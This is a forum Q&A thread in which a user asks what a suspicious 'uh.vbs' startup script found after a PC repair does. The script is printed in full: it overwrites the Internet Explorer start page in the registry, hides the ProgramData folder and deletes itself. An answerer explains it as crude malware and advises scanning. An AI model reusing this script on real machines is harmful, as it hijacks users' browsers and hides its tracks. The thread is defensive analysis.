# What does this Visual Basic Sript called uh.vbs do?

Tags: vbscript

not long ago sent my computer away for some off-warranty work (the BIOS was not recognizing one of my HDD bays) and when it came back with a new HDD board, I was getting an odd error while rebooting.

Eventually I figured out that there was a new file, called "uh.vbs", in the Windows startup folder, and there was an error when it was run upon boot. Not knowing anything about vbs I have no idea what this file does, beyond that it was either created or modified while my computer was in the repair shop. I notice that it points to a couple webpages, and has some Chinese characters, so I'm hoping that one of the well-versed people on this site can fill me in. Below is the code...

Edit: I had to take a bunch of it out because of a strange error apparently caused by Chinese characters, which is not identified by the site and which took me half an hour to eventually figure out. I deleted the Chinese-looking characters and put MISSING_CHINESE_CHARTERS everywhere I took them out.

```
On Error Resume Next
set lhwy=createobject("wscript.shell")

path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")

WScript.Sleep(30000)

set lhwy=createobject("wscript.shell")
path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")


Dim objws,objfso,dn
Set objws=WScript.CreateObject("wscript.shell")
Set objfso=CreateObject("scripting.filesystemobject")
dn=objfso.GetDriveName(WScript.ScriptFullName)
objws.run "attrib +h " & dn & "\ProgramData",0

Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 3000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\Documents and Settings\All Users\「MISSING_CHINESE_CHARACTERS\uh.VBS") Then
  fso.DeleteFile("\Documents and Settings\All Users\「MISSING_CHINESE_CHARACTERS\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if


Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then
fso.DeleteFile("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if

Wscript.quitPAPK
```

Thanks for any input.

Comment: Anyone know how I can post the missing lines with the Chinese text?

Comment: Can you not put them in a `<pre>` block? If it looks like *"Chinese"* then it's probably encrypted or obfuscated in some way.

Comment: @lankymart You could be right. I just replaced the Chinese-looking characters with plain text and put the lines of code back in. I noticed that some of the characters were part of a path...

Answer (score 1):

It seems to be a relatively poor attempt at malware.

This bit is trying to set your IE start page to `http://home.yy8000.com/` -

```
path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
```

Then the next bit waits 30 seconds before doing it again (the writer probably thought there was a chance the registry would be inaccessible when the script first runs).

This next bit is a little odd, it hides the `ProgramData` folder (which in most cases will be hidden anyway) -

```
Dim objws,objfso,dn
Set objws=WScript.CreateObject("wscript.shell")
Set objfso=CreateObject("scripting.filesystemobject")
dn=objfso.GetDriveName(WScript.ScriptFullName)
objws.run "attrib +h " & dn & "\ProgramData",0
```

The section with the unusual characters simply delete the script once it's done it's "damage".

```
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 3000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\Documents and Settings\All Users\「MISSING_CHINESE_CHARACTERS\uh.VBS") Then
  fso.DeleteFile("\Documents and Settings\All Users\「MISSING_CHINESE_CHARACTERS\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if


Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then
fso.DeleteFile("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if
```

My suspicion would be that the people who did the repair plugged a USB stick into your computer that had previously been plugged into another repair.  The file had been copied automatically onto the USB and then onto your computer when they plugged it in.

Delete the file and do a virus check.  The malware attempt is so poor this simple script may be hiding a bigger issue.  I've seen scripts like this in the past where there is another process running that creates the script file (possibly during shutdown).

Look at Kaspersky's live CD if you didn't have a virus checker installed before sending your PC in for warranty.

Comment: I just added back in the lines with the Chinese-looking characters, with plain text in their place so that I could post it. Certainly looked shady. I have a hard time believing the repair techs would be ignorant enough to accidentally plug in infected hardware, but then again, I would hope that it wasn't intentional either. It's been a week since this happened and I've been running normal virus scans. Nothing out of the ordinary has shown up

Comment: @omaxio I find it a lot easier to believe that the repair tech was a little lax in their security procedures than they are intentionally infecting the PC's they are repairing.  It could also be that it was something you downloaded in the past that only activated while the PC was in repair.  I've updated my answer to reflect the chineese character sections and would recommend a full system virus scan, just to be sure.

Comment: Thanks John. Yes that's true: it could have been there previously but only came to light after the repairs. Either way, the file is gone and virus and malware scans have come back clean. Cheers